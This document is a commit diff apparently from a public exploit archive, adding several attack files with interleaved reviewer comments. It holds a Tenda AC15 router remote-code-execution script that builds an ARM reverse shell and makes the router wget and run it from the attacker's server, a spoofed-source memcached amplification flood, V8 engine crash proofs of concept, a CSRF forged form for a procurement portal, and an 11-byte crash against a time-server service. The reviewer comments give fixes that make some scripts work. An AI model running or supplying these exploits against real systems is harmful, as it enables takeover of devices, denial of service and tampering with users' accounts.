DB: 2018-03-07

8 changes to exploits/shellcodes

Memcached - 'memcrashed' Denial of Service
Softros Network Time System Server 2.3.4 - Denial of Service
Chrome V8 JIT - Simplified-lowererer IrOpcode::kStoreField_ IrOpcode::kStoreElement Optimization Bug
Chrome V8 JIT - JSBuiltinReducer::ReduceObjectCreate Fails to Ensure that the Prototype is _null_
Chrome V8 JIT - 'GetSpecializationContext' Type Confusion
Chrome V8 JIT - Empty BytecodeJumpTable Out-of-Bounds Read

Tenda AC15 Router - Unauthenticated Remote Code Execution

Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download (PoC)
Joomla! Component Joomanager 2.0.0 - 'com_Joomanager' Arbitrary File Download (PoC)

Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download
Joomla! Component Joomanager 2.0.0 - 'com_Joomanager' Arbitrary File Download
Bravo Tejari Web Portal - Cross-Site Request Forgery
This commit is contained in:
Offensive Security 2018-03-07 05:01:51 +00:00
parent 6a017b10c8
commit 9897272892
9 changed files with 757 additions and 2 deletions

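--- a/exploits/hardware/remote/44253.py
+++ b/exploits/hardware/remote/44253.py
@@ -0,0 +1,243 @@
+#!/usr/bin/env python
+# EDB Note ~ Source: https://www.fidusinfosec.com/remote-code-execution-cve-2018-5767/
+import urllib2
+import struct
+import time
+import socket
+from optparse import *
+import SimpleHTTPServer
+import SocketServer
+import threading
+import sys
+import os
+import subprocess
+ARM_REV_SHELL = (
+"#include <sys/socket.h>\n"
+"#include <sys/types.h>\n"
+"#include <string.h>\n"
+"#include <stdio.h>\n"
+"#include <netinet/in.h>\n"
+"int main(int argc, char **argv)\n"
+"{\n"
+" struct sockaddr_in addr;\n"
+" socklen_t addrlen;\n"
+" int sock = socket(AF_INET, SOCK_STREAM, 0);\n"
+" memset(&addr, 0x00, sizeof(addr));\n"
+" addr.sin_family = AF_INET;\n"
+" addr.sin_port = htons(%d);\n"
+" addr.sin_addr.s_addr = inet_addr(\"%s\");\n"
+" int conn = connect(sock, (struct sockaddr *)&addr,sizeof(addr));\n"
+" dup2(sock, 0);\n"
+" dup2(sock, 1);\n"
+" dup2(sock, 2);\n"
+" system(\"/bin/sh\");\n"
+"}\n"
+)
+REV_PORT = 31337
+HTTPD_PORT = 8888
+DONE = False
+"""
+* This function creates a listening socket on port
+* REV_PORT. When a connection is accepted it updates
+* the global DONE flag to indicate successful exploitation.
+* It then jumps into a loop whereby the user can send remote
+* commands to the device, interacting with a spawned /bin/sh
+* process.
+"""
+def threaded_listener():
+global DONE
+s = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
+host = ("0.0.0.0", REV_PORT)
+try:
+s.bind(host)
+except:
+print "[+] Error binding to %d" %REV_PORT
+return -1
+print "[+] Connect back listener running on port %d" %REV_PORT
+s.listen(1)
+conn, host = s.accept()
+#We got a connection, lets make the exploit thread aware
+DONE = True
+print "[+] Got connect back from %s" %host[0]
+print "[+] Entering command loop, enter exit to quit"
+#Loop continuosly, simple reverse shell interface.
+while True:
+print "#",
+cmd = raw_input()
+if cmd == "exit":
+break
+if cmd == '':
+continue
+conn.send(cmd + "\n")
+print conn.recv(4096)
+"""
+* Take the ARM_REV_SHELL code and modify it with
+* the given ip and port to connect back to.
+* This function then compiles the code into an
+* ARM binary.
+@Param comp_path This should be the path of the cross-compiler.
+@Param my_ip The IP address of the system running this code.
+"""
+def compile_shell(comp_path, my_ip):
+global ARM_REV_SHELL
+outfile = open("a.c", "w")
+ARM_REV_SHELL = ARM_REV_SHELL%(REV_PORT, my_ip)
+outfile.write(ARM_REV_SHELL)
+outfile.close()
+compile_cmd = [comp_path, "a.c","-o", "a"]
+s = subprocess.Popen(compile_cmd, stderr=subprocess.PIPE, stdout=subprocess.PIPE)
+while s.poll() == None:
+continue
+if s.returncode == 0:
+return True
+else:
+print "[x] Error compiling code, check compiler? Read the README?"
+return False
+"""
+* This function uses the SimpleHTTPServer module to create
+* a http server that will serve our malicious binary.
+* This function is called as a thread, as a daemon process.
+"""
+def start_http_server():
+Handler = SimpleHTTPServer.SimpleHTTPRequestHandler
+httpd = SocketServer.TCPServer(("", HTTPD_PORT), Handler)
+print "[+] Http server started on port %d" %HTTPD_PORT
+httpd.serve_forever()
+"""
+* This function presents the actual vulnerability exploited.
+* The Cookie header has a password field that is vulnerable to
+* a sscanf buffer overflow, we make use of 2 ROP gadgets to
+* bypass DEP/NX, and can brute force ASLR due to a watchdog
+* process restarting any processes that crash.
+* This function will continually make malicious requests to the
+* devices web interface until the DONE flag is set to True.
+@Param host the ip address of the target.
+@Param port the port the webserver is running on.
+@Param my_ip The ip address of the attacking system.
+"""
+def exploit(host, port, my_ip):
+global DONE
+url = "http://%s:%s/goform/exeCommand"%(host, port)
+i = 0
+command = "wget http://%s:%s/a -O /tmp/a && chmod 777 /tmp/a && /tmp/./a &;" %(my_ip, HTTPD_PORT)
+#Guess the same libc base continuosly
+libc_base = ****
+curr_libc = libc_base + (0x7c << 12)
+system = struct.pack("<I", curr_libc + ****)
+#: pop {r3, r4, r7, pc}
+pop = struct.pack("<I", curr_libc + ****)
+#: mov r0, sp ; blx r3
+mv_r0_sp = struct.pack("<I", curr_libc + ****)
+password = "A"*offset
+password += pop + system + "B"*8 + mv_r0_sp + command + ".gif"
+print "[+] Beginning brute force."
+while not DONE:
+i += 1
+print "[+] Attempt %d" %i
+#build the request, with the malicious password field
+req = urllib2.Request(url)
+req.add_header("Cookie", "password=%s"%password)
+#The request will throw an exception when we crash the server,
+#we don't care about this, so don't handle it.
+try:
+resp = urllib2.urlopen(req)
+except:
+pass
+#Give the device some time to restart the
+time.sleep(1)
+print "[+] Exploit done"
+def main():
+parser = OptionParser()
+parser.add_option("-t", "target", dest="host_ip", help="IP address of the target")
+parser.add_option("-p", "port", dest="host_port", help="Port of the targets webserver")
+parser.add_option("-c", "comp-path", dest="compiler_path", help="path to arm cross compiler")
+parser.add_option("-m", "my-ip", dest="my_ip", help="your ip address")
+options, args = parser.parse_args()
+host_ip = options.host_ip
+host_port = options.host_port
+comp_path = options.compiler_path
+my_ip = options.my_ip
+if host_ip == None or host_port == None:
+parser.error("[x] A target ip address (-t) and port (-p) are required")
+if comp_path == None:
+parser.error("[x] No compiler path specified, you need a uclibc arm cross compiler, such as https://www.uclibc.org/downloads/binaries/0.9.30/cross-compiler-arm4l.tar.bz2")
+if my_ip == None:
+parser.error("[x] Please pass your ip address (-m)")
+if not compile_shell(comp_path, my_ip):
+print "[x] Exiting due to error in compiling shell"
+return -1
+httpd_thread = threading.Thread(target=start_http_server)
+httpd_thread.daemon = True
+httpd_thread.start()
+conn_listener = threading.Thread(target=threaded_listener)
+conn_listener.start()
+#Give the thread a little time to start up, and fail if that happens
+time.sleep(3)
+if not conn_listener.is_alive():
+print "[x] Exiting due to conn_listener error"
+return -1
+exploit(host_ip, host_port, my_ip)
+conn_listener.join()
+return 0
+if __name__ == '__main__':
+main()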
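Review bot: As committed the script cannot run: the `****` placeholders in `libc_base = ****` and the three gadget addresses are not valid Python (SyntaxError at import), and `offset` in `password = "A"*offset` is never defined, so `exploit()` would raise NameError before the first request even once the addresses are filled in. A header comment should say that these values were redacted on purpose and must be recovered from the target firmware's libc, e.g. `# NOTE: libc_base, the gadget offsets and the overflow offset are intentionally redacted; supply them for your firmware build`. In `compile_shell`, the `while s.poll() == None` busy-loop with both pipes attached never drains them, so a verbose compiler can block on a full pipe and its error text is discarded; `out, err = s.communicate()` followed by `print err` on failure fixes both. Note also that `SimpleHTTPServer` serves the whole working directory, not only `a`, so the script should be run from a scratch directory.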

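--- a/exploits/linux/dos/44254.py
+++ b/exploits/linux/dos/44254.py
@@ -0,0 +1,90 @@
+# Written by Alex Conrey
+# Download: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/44254.zip
+#
+# This program is free software: you can redistribute it and/or modify
+# it under the terms of the GNU General Public License as published by
+# the Free Software Foundation, either version 3 of the License, or
+# (at your option) any later version.
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+# You should have received a copy of the GNU General Public License
+# along with this program. If not, see <http://www.gnu.org/licenses/>.
+#
+# This was created to better understand the memcrashed exploit
+# brought to light thanks to CloudFlare.
+# (https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/)
+#
+# Please sysadmin responsibly.
+import requests
+import memcache
+import re
+from scapy.all import *
+# Vulnerable memcached server list
+SERVER_LIST = [
+'172.17.0.2:11211',
+]
+# Destination
+TARGET = '1.2.3.4'
+# optional payload to set if no keys exist
+payload = requests.get('https://google.com').text
+payload_key = 'fuckit'
+# this forces payload to load into memory for being extra-evil and efficient
+if not payload:
+print 'Could not import payload, continuing anyway'
+try:
+for server in SERVER_LIST:
+if ':' in server:
+server = server.split(':')[0]
+ip = IP(src=TARGET, dst=server)
+packet_base = '\x00\x00\x00\x00\x00\x01\x00\x00{0}\r\n'
+# fetch known keys by id
+statitems_packet = packet_base.format('stats items')
+udp = UDP(sport=50000, dport=11211)/statitems_packet
+keyids = []
+resp = sr1(ip/udp)
+for key in str(resp.payload).split('\r\n'):
+# Skip first line which has hex in it (I'm lazy)
+if 'age' in key:
+key = key.split(':')[1]
+keyids.append(key)
+# fetch names for keys by id
+keys = []
+for kid in keyids:
+query = 'stats cachedump {0} 100'.format(kid)
+keyid_packet = packet_base.format(query)
+udp = UDP(sport=50000, dport=11211)/keyid_packet
+resp = str(sr1(ip/udp).payload).split('\r\n')
+for key in resp:
+if 'ITEM' in key:
+res = re.match(r"(.*)ITEM (?P<keyname>\w+)(.*)",key)
+keys.append(res.group('keyname'))
+# if keys not present on target, make one
+if not keys:
+mc = memcache.Client([server],debug=False)
+mc.set(payload_key, payload)
+keys.append(payload_key)
+# iterate thru known keys and blast away
+for key in keys:
+query = 'get {0}'.format(key)
+fun_packet = packet_base.format(query)
+udp = UDP(sport=50000, dport=11211)/fun_packet
+sr1(ip/udp)
+except Exception:
+raise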
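Review bot: The reconnaissance probes reuse the spoofed header `ip = IP(src=TARGET, dst=server)` for `stats items` and `stats cachedump`, so their replies are addressed to TARGET and never reach this host; `sr1()` is called without `timeout=` and will block indefinitely, and if it does return `None` the `resp.payload` access raises AttributeError. Each `sr1` call needs a `timeout` and a `None` check before its payload is parsed. The trailing `except Exception: raise` is a no-op and can be removed, and with `SERVER_LIST`/`TARGET` hard-coded a comment such as `# Sends spoofed traffic toward TARGET: lab hosts you control only` belongs next to those constants.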

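--- a/exploits/multiple/dos/44257.js
+++ b/exploits/multiple/dos/44257.js
@@ -0,0 +1,72 @@
+/*
+I think this commit has introduced the bugs: https://chromium.googlesource.com/v8/v8/+/c22ca7f73ba92f22d0cd29b06bb2944a545a8d3e%5E%21/#F0
+Here's a snippet.
+case IrOpcode::kStoreField: {
+FieldAccess access = FieldAccessOf(node->op());
+Node* value_node = node->InputAt(1);
+NodeInfo* input_info = GetInfo(value_node);
+MachineRepresentation field_representation =
+access.machine_type.representation();
+// Make sure we convert to Smi if possible. This should help write
+// barrier elimination.
+if (field_representation == MachineRepresentation::kTagged &&
+TypeOf(value_node)->Is(Type::SignedSmall())) {
+field_representation = MachineRepresentation::kTaggedSigned;
+}
+WriteBarrierKind write_barrier_kind = WriteBarrierKindFor(
+access.base_is_tagged, field_representation, access.offset,
+access.type, input_info->representation(), value_node);
+ProcessInput(node, 0, UseInfoForBasePointer(access));
+ProcessInput(node, 1,
+TruncatingUseInfoFromRepresentation(field_representation));
+ProcessRemainingInputs(node, 2);
+SetOutput(node, MachineRepresentation::kNone);
+if (lower()) {
+if (write_barrier_kind < access.write_barrier_kind) {
+access.write_barrier_kind = write_barrier_kind;
+NodeProperties::ChangeOp(
+node, jsgraph_->simplified()->StoreField(access));
+}
+}
+return;
+}
+Since Smi stores can be performed without write barriers, if it's possible to convert to Smi, it tries to help write barrier elimination by changing field_representation to MachineRepresentation::kTaggedSigned as noted in the comment. But whether or not field_representation has changed, it uses TruncatingUseInfoFromRepresentation to process the value node.
+But TruncatingUseInfoFromRepresentation(kTaggedSigned) returns UseInfo::AnyTagged() which is also compatible with kTaggedPointer. So even in the case where input_info->representation() is kTaggedPointer and the value is a heap object, it may eliminate the write barrier.
+Note: It's the same when handling kStoreElement.
+PoC 1 using kStoreField.
+*/
+var a, b; // should be var
+for (var i = 0; i < 100000; i++) {
+b = 1;
+a = i + -0; // -0 is a number, so this will make "a" a heap object.
+b = a;
+}
+print(a === b); // true
+gc();
+print(a === b); // false
+print(b);
+/*
+PoC 2 using kStoreElement.
+let arr = [{}];
+var v; // should be var
+for (var i = 0; i < 700000; i++) {
+arr[0] = 1;
+v = i + -0;
+arr[0] = v;
+}
+print(arr[0] === v) // true
+gc();
+print(arr[0] === v) // false
+print(arr[0]);
+*/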
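Review bot: The file never says how it must be run: both PoCs call `gc()` and `print()`, which exist in the d8 shell rather than in a browser, and `gc()` is only exposed there with `--expose-gc`; PoC 2 is also left commented out with no explanation. A one-line header such as `// Run under d8 with --expose-gc; PoC 2 (kStoreElement path) is commented out below, uncomment to test it` would make it reproducible. The affected revision is given only as the suspected introducing commit, so recording the V8 version the PoC was confirmed against would help triage.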

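--- a/exploits/multiple/dos/44258.js
+++ b/exploits/multiple/dos/44258.js
@@ -0,0 +1,31 @@
+/*
+I think this commit has introduced the bug.
+https://chromium.googlesource.com/v8/v8/+/ff7063c7d5d8ad8eafcce3da59e65d7fe2b4f915%5E%21/#F2
+According to the description, Object.create is supposed to be inlined only when the prototype given as the parameter is "null".
+The following check has to guarantee it, but it can't guarantee it. Any receiver can get through the check, then Map::GetObjectCreateMap may transition the prototype, which may lead to type confusion.
+if (!prototype_const->IsNull(isolate()) && !prototype_const->IsJSReceiver()) {
+return NoChange();
+}
+instance_map = Map::GetObjectCreateMap(prototype_const);
+PoC:
+*/
+var object;
+function opt() {
+opt['x'] = 1.1;
+try {
+Object.create(object);
+} catch (e) {
+}
+for (let i = 0; i < 1000000; i++) {
+}
+}
+opt();
+object = opt;
+opt();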

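--- a/exploits/multiple/dos/44259.js
+++ b/exploits/multiple/dos/44259.js
@@ -0,0 +1,47 @@
+PoC:
+function* opt(arg = () => arg) {
+let tmp = opt.x; // LdaNamedProperty
+for (;;) {
+arg;
+yield;
+function inner() {
+tmp;
+}
+break;
+}
+}
+for (let i = 0; i < 100000; i++) {
+opt();
+}
+/*
+PoC for release build:
+function* opt(arg = () => {
+arg;
+this;
+}, opt) {
+let tmp = arg.x;
+for (;;) {
+arg;
+yield;
+tmp = {
+inner() {
+tmp;
+}
+};
+}
+}
+for (let i = 0; i < 10000; i++) {
+opt();
+}
+What happened:
+1. The LdaNamedProperty operation "opt.x" was lowered to a graph exit in the graph builder. This set the current environment to nullptr (BytecodeGraphBuilder::ApplyEarlyReduction).
+2. The environment for the next block (for-loop) was supposed to be created from merging with the previous environment, but it had been set to nullptr at 1. So the context value remained as "undefined".
+3. But GetSpecializationContext directly casted the context value to Context* which resulted in type confusion.
+*/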
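Review bot: The leading `PoC:` on the first line sits outside any comment, so the shell parses it as a statement label in front of a `function*` declaration, which is presumably a SyntaxError and stops the first PoC from loading at all; changing it to `// PoC:` (consistent with the `/* … */` block that wraps the second PoC) fixes this. The first PoC is explained only by the "What happened" note at the very end, and nothing says which of the two variants is meant for a debug build; a short header stating `// First PoC: debug build; the release-build variant is in the comment block below` would save the reader a pass through the file.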

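--- a/exploits/multiple/dos/44260.js
+++ b/exploits/multiple/dos/44260.js
@@ -0,0 +1,57 @@
+/*
+In the current implementation, the bytecode generator also emits empty jump tables.
+https://cs.chromium.org/chromium/src/v8/src/interpreter/bytecode-array-writer.cc?rcl=111e990462823c9faeee06b67c0dcf05749d4da8&l=89
+So the bytecode for the example code would be generated as follows:
+Code:
+function* opt() {
+for (;;)
+if (true) {
+} else {
+yield; // never reaches, never hits BindJumpTableEntry
+}
+}
+Bytecode:
+...
+0x35dda532a2a5 @ 75 : 90 04 01 01 SwitchOnSmiNoFeedback [4], [1], [1] { } <<--- SIZE: 1, but EMPTY
+...
+Here's a snippet of JumpTableTargetOffsets::iterator::UpdateAndAdvanceToValid which is used to enumerate a jump table.
+void JumpTableTargetOffsets::iterator::UpdateAndAdvanceToValid() {
+if (table_offset_ >= table_end_) return;
+current_ = accessor_->GetConstantAtIndex(table_offset_);
+Isolate* isolate = accessor_->bytecode_array()->GetIsolate();
+while (current_->IsTheHole(isolate)) {
+++table_offset_;
+++index_;
+current_ = accessor_->GetConstantAtIndex(table_offset_);
+}
+}
+If the jump table is empty, table_offset_ may exceed table_end_. As a result, out-of-bounds reads occur.
+PoC:
+*/
+function* opt() {
+for (;;)
+if (true) {
+} else {
+yield;
+}
+for (;;)
+if (true) {
+} else {
+yield; yield; yield; yield; yield; yield; yield; yield;
+}
+}
+for (let i = 0; i < 100000; i++)
+opt();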

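--- a/exploits/multiple/webapps/44256.html
+++ b/exploits/multiple/webapps/44256.html
@@ -0,0 +1,98 @@
+Exploit Title: Bravo Tejari Web Portal-CSRF
+CVE-ID: CVE-2018-7216
+Vulnerability Type: Cross Site Request Forgery (CSRF)
+Vendor of Product: Tejari
+Affected Product Code Base: Bravo Solution
+Affected Component: Web Interface Management.
+Attack Type: Local - Authenticated
+Impact: Unauthorised Access
+Category: WebApps
+Author: Arvind V.
+Author Social: @Find_Arvind
+Vulnerability Type: Cross Site Request Forgery (CSRF)
+Vendor of Product: Tejari
+Affected Product Code Base: Bravo Solution
+Affected Component: Web Interface Management.
+Attack Type: Local - Authenticated
+Impact: Unauthorised Access
+Product description:
+Bravo Tejari is a strategic procurement platform that enables organizations
+to generate more value, influence innovation and reduce risk powered by a
+unique supplier-centered approach that integrates supplier lifetime value
+throughout the entire procurement process
+Attack Scenario:
+The Web Interface of the Bravo Tejari procurement portal does not use
+random tokens to block any kind of forged requests. An atacker can take
+advantage of this scenario and create a forged request to edit user account
+details like name, address of the company/individual, email address etc. He
+then uses social engineering techniques to target specific individuals
+whose account details he would like to change. He simply sends the link and
+tricks the user into clicking the forged http request. The request is
+executed and user account details are changed without his knowledge.
+Proof of Concept Code:
+Forged HTTP Request used by the attacker:
+<html>
+<body>
+<form action="https://XXXX.XXXX.com/esop/toolkit/profile/regData.do"
+method="POST">
+<input type="hidden" name="userAct" value="confirmData" />
+<input type="hidden" name="from" value="registration&#95;data" />
+<input type="hidden" name="actionNumber" value="0" />
+<input type="hidden" name="companyExtStatusCode" value="31" />
+<input type="hidden" name="companyExtStatusNote" value="" />
+<input type="hidden" name="hideCompany" value="false" />
+<input type="hidden" name="companyName"
+value="XYZ&#32;COMPUTER&#32;SYSTEMS&#32;FZ&#32;LLC" />
+<input type="hidden" name="companyAddress"
+value="Dubai&#32;internet&#32;city&#44;&#32;DUBAI" />
+<input type="hidden" name="companyCity" value="DUBAI" />
+<input type="hidden" name="companyCountry" value="AE" />
+<input type="hidden" name="companyProvince" value="Dubai" />
+<input type="hidden" name="companyZip" value="25703" />
+<input type="hidden" name="companyPhone" value="43918600" />
+<input type="hidden" name="companyFax" value="" />
+<input type="hidden" name="companyEmail"
+value="XYZ&#46;v&#64;XYZ&#46;com" />
+<input type="hidden" name="companyWebSite" value="" />
+<input type="hidden" name="companyLegalStructure" value="" />
+<input type="hidden" name="companyAddress2" value="" />
+<input type="hidden" name="companyFiscalCode" value="215703" />
+<input type="submit" value="Submit request" />
+</form>
+</body>
+</html>
+Impact:
+The affected product is a procurement portal and so all communication
+regarding the contract lifecycle process is sent to user details provided
+on the portal. If this vulnerability is sucessfully exploited, the attacker
+will be able to change these details which will potentially affect the
+victim's business.
+Recommendation:
+Ensure that all sensitive CRUD Operations are appropriately protected with
+random tokens. Alternatively, the sensitive operations should also have an
+authentication layer to confirm user verification.
+References:
+http://seclists.org/fulldisclosure/2018/Feb/44
+https://packetstormsecurity.com/files/146409/Tejari-Cross-Site-Request-Forgery.html
+https://www.securityfocus.com/archive/1/541782/30/0/threaded
+Credit: Arvind Vishwakarma
+http://ultimateone1.blogspot.ae/
+Vulnerability Timeline:
+12th December 2017 Vulnerability Discovered
+23rd December 2017 Contacted Vendor No Response
+7th January 2018 Contacted Vendor again No Response
+15th February 2018 Vulnerability Disclosed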
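Review bot: The metadata block is duplicated — the six lines from `Vulnerability Type` through `Impact` appear twice — and `Attack Type: Local - Authenticated` contradicts the scenario that follows: the victim must be logged in, but the attacker delivers the forged page remotely, so this is a remote, network-delivered attack against an authenticated session. The recommendation is too vague to act on; it should name the concrete controls: a per-session anti-CSRF token validated server-side on `regData.do`, `SameSite=Lax` or stricter on the session cookie, and an `Origin`/`Referer` check, with re-authentication for changes to contact e-mail since that is the channel the Impact section says contract traffic flows through. The `XXXX.XXXX.com` placeholder in the form action should also be called out as such so readers do not mistake it for a typo.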

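--- a/exploits/windows/dos/44255.txt
+++ b/exploits/windows/dos/44255.txt
@@ -0,0 +1,109 @@
+[+] Credits: John Page (aka hyp3rlinx)
+[+] Website: hyp3rlinx.altervista.org
+[+] Source: http://hyp3rlinx.altervista.org/advisories/SOFTROS-NETWORK-TIME-SYSTEM-SERVER-v2.3.4-DENIAL-OF-SERVICE.txt
+[+] ISR: Apparition Security
+Vendor:
+=============
+www.softros.com
+https://nts.softros.com/downloads/
+Product:
+===========
+Network Time System Server v2.3.4
+Both x86/x64 versions
+Network Time System provides a solution to system time maintenance problems. This powerful client/server software enables you to set up a
+virtually fail-safe synchronized time environment for networks of any size and complexity, from small office networks (LAN) to those
+maintained at large enterprises (VPN, VLAN, WAN), from single site networks to those including numerous domains and involving complex
+routing techniques. Network Time System allows the creation of a custom source of precise time in a corporate network environment
+establishing an interconnected time synchronization system for each and every machine and device on the company network.
+Vulnerability Type:
+===================
+Denial Of Service
+CVE Reference:
+==============
+CVE-2018-7658
+Security Issue:
+================
+Network Time System (Server) "NTSServerSvc" service listens on Port 7001, unauthenticated remote attackers can crash the
+Server by sending exactly 11 bytes to the target system. Systems which may depend on critical time synchronization
+could then potentially be impacted.
+Stack dump:
+'''
+eax=0320119a ebx=0000000b ecx=000000ff edx=00000000 esi=03167040 edi=0050b328
+eip=004069a5 esp=0447fee8 ebp=0447ff28 iopl=0 nv up ei ng nz ac pe cy
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010297
+NTSServerSvc+0x69a5:
+004069a5 880a mov byte ptr [edx],cl ds:0023:00000000=??
+Resetting default scope
+FAULTING_IP:
+NTSServerSvc+69a5
+004069a5 880a mov byte ptr [edx],cl
+EXCEPTION_RECORD: (.exr -1)
+ExceptionAddress: 004069a5 (NTSServerSvc+0x000069a5)
+ExceptionCode: c0000005 (Access violation)
+'''
+Exploit/POC:
+=============
+import socket
+#Network Time System (Server) NTSServerSvc.exe v2.3.4
+#Softros Systems
+#NTS Server service for time synchronization over network
+print 'Network Time Server 11 byte Denial Of Service'
+print 'by hyp3rlinx'
+HOST=raw_input('Network Time Server IP')
+PORT=7001
+payload='A'*11
+s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
+s.connect((HOST,PORT))
+s.send(payload)
+s.close()
+Network Access:
+===============
+Remote
+Severity:
+=========
+Medium
+Disclosure Timeline:
+=============================
+Vendor Notification: February 10, 2018
+Second attempt : February 24, 2018
+Request CVE, assigned by Mitre : March 3, 2018
+March 5, 2018: Public Disclosure
+[+] Disclaimer
+The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
+Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
+that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
+is given to the author. The author prohibits any malicious use of security related information
+or exploits by the author or elsewhere. All content (c).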
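Review bot: The advisory never interprets its own stack dump: `mov byte ptr [edx],cl` with `edx=00000000` is a write through a NULL pointer (and `ebx=0000000b` matches the 11-byte message), so the visible failure is a NULL-pointer write that crashes the service rather than evidence of controllable memory corruption; saying so under Security Issue would justify the Medium/DoS rating and stop readers from over-reading it. In the PoC, `s.send(payload)` does not guarantee all 11 bytes are written — `s.sendall(payload)` does — and `raw_input('Network Time Server IP')` has no separator before the typed value (`'Network Time Server IP: '`). The timeline lists two unanswered vendor contacts but no fixed version, so the advisory should state plainly that no patch was available at disclosure.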


@ -5890,6 +5890,12 @@ id,file,description,date,author,type,platform,port
44236,exploits/macos/dos/44236.c,"Apple macOS Sierra 10.12.3 - 'IOFireWireFamily-null-deref' FireWire Port Denial of Service",2017-08-16,"Brandon Azad",dos,macos,
44247,exploits/multiple/dos/44247.txt,"Suricata < 4.0.4 - IDS Detection Bypass",2018-03-05,"Positive Technologies",dos,multiple,
44251,exploits/windows/dos/44251.txt,"ActivePDF Toolkit < 8.1.0.19023 - Multiple Memory Corruptions",2018-03-05,"François Goichon",dos,windows,
44254,exploits/linux/dos/44254.py,"Memcached - 'memcrashed' Denial of Service",2018-03-05,"Alex Conrey",dos,linux,11211
44255,exploits/windows/dos/44255.txt,"Softros Network Time System Server 2.3.4 - Denial of Service",2018-03-06,hyp3rlinx,dos,windows,
44257,exploits/multiple/dos/44257.js,"Chrome V8 JIT - Simplified-lowererer IrOpcode::kStoreField_ IrOpcode::kStoreElement Optimization Bug",2018-03-06,"Google Security Research",dos,multiple,
44258,exploits/multiple/dos/44258.js,"Chrome V8 JIT - JSBuiltinReducer::ReduceObjectCreate Fails to Ensure that the Prototype is _null_",2018-03-06,"Google Security Research",dos,multiple,
44259,exploits/multiple/dos/44259.js,"Chrome V8 JIT - 'GetSpecializationContext' Type Confusion",2018-03-06,"Google Security Research",dos,multiple,
44260,exploits/multiple/dos/44260.js,"Chrome V8 JIT - Empty BytecodeJumpTable Out-of-Bounds Read",2018-03-06,"Google Security Research",dos,multiple,
3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@ -16299,6 +16305,7 @@ id,file,description,date,author,type,platform,port
44229,exploits/php/remote/44229.txt,"WordPress Plugin Polls 1.2.4 - SQL Injection (PoC)",2017-10-22,"Manish Tanwar",remote,php,
44242,exploits/android/remote/44242.md,"Papenmeier WiFi Baby Monitor Free & Lite < 2.02.2 - Remote Audio Record",2018-02-25,iamrastating,remote,android,
44245,exploits/hardware/remote/44245.rb,"NETGEAR - 'TelnetEnable' Magic Packet (Metasploit)",2018-03-05,Metasploit,remote,hardware,23
44253,exploits/hardware/remote/44253.py,"Tenda AC15 Router - Unauthenticated Remote Code Execution",2018-02-14,"Tim Carrington",remote,hardware,
6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@ -38564,7 +38571,7 @@ id,file,description,date,author,type,platform,port
42585,exploits/php/webapps/42585.txt,"PHP Video Battle Script 1.0 - SQL Injection",2017-08-28,"Ihsan Sencan",webapps,php,
42588,exploits/hardware/webapps/42588.txt,"Brickcom IP Camera - Credentials Disclosure",2017-08-29,"Emiliano Ipar",webapps,hardware,
42589,exploits/php/webapps/42589.txt,"Joomla! Component Quiz Deluxe 3.7.4 - SQL Injection",2017-08-30,"Ihsan Sencan",webapps,php,
42590,exploits/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download (PoC)",2017-08-30,"Ihsan Sencan",webapps,php,
42590,exploits/php/webapps/42590.txt,"Joomla! Component Joomanager 2.0.0 - 'com_Joomanager' Arbitrary File Download (PoC)",2017-08-30,"Ihsan Sencan",webapps,php,
42591,exploits/php/webapps/42591.txt,"iBall Baton 150M Wireless Router - Authentication Bypass",2017-03-07,Indrajith.A.N,webapps,php,
42592,exploits/php/webapps/42592.html,"Invoice Manager 3.1 - Cross-Site Request Forgery (Add Admin)",2017-08-30,"Ali BawazeEer",webapps,php,
42595,exploits/php/webapps/42595.txt,"PHP-SecureArea < 2.7 - Multiple Vulnerabilities",2017-08-30,Cryo,webapps,php,
@ -38961,4 +38968,5 @@ id,file,description,date,author,type,platform,port
44223,exploits/php/webapps/44223.txt,"uWSGI < 2.0.17 - Directory Traversal",2018-03-02,"Marios Nicolaides",webapps,php,
44241,exploits/windows/webapps/44241.txt,"Parallels Remote Application Server 15.5 - Path Traversal",2018-02-22,"Nicolas Markitanis",webapps,windows,
44250,exploits/php/webapps/44250.txt,"ClipBucket < 4.0.0 - Release 4902 - Command Injection / File Upload / SQL Injection",2018-03-05,"SEC Consult",webapps,php,80
44252,exploits/php/webapps/44252.py,"Joomla! Component Joomanager 2.0.0 - ' com_Joomanager' Arbitrary File Download",2017-07-01,Luth1er,webapps,php,
44252,exploits/php/webapps/44252.py,"Joomla! Component Joomanager 2.0.0 - 'com_Joomanager' Arbitrary File Download",2017-07-01,Luth1er,webapps,php,
44256,exploits/multiple/webapps/44256.html,"Bravo Tejari Web Portal - Cross-Site Request Forgery",2018-03-06,"Arvind V",webapps,multiple,
